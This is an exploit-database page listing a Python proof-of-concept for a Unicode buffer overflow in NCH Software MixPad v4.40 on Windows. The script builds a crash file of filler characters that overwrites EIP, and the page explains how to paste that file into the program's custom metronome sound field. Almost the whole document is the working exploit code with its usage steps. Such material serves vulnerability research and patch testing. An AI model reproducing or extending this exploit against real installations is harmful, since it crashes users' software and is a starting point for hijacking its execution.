[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MixPad v4.40 - Unicode Buffer Overflow Exploit

Author
Gionathan Reale
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31776
Category
dos / poc
Date add
13-12-2018
Platform
windows
#!/usr/bin/python
# Exploit Author: Gionathan "John" Reale
# Exploit Title: NCH Software MixPad v4.40 - Unicode Buffer Overflow
# Date: 2018-12-12
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/
# Version: v4.40-v4.10
# Tested On: Windows 7
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' 


filename="crash.txt"
 
junk = "A"*249
eip = "\xcc"*2  			
fill = "B"*100				
buffer = junk + eip + fill

  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

#  0day.today [2024-11-15]  #